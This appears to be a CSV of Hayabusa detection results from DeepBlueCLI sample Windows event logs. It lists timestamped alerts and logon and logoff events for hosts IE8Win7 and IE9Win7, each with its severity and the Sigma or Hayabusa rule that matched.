2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
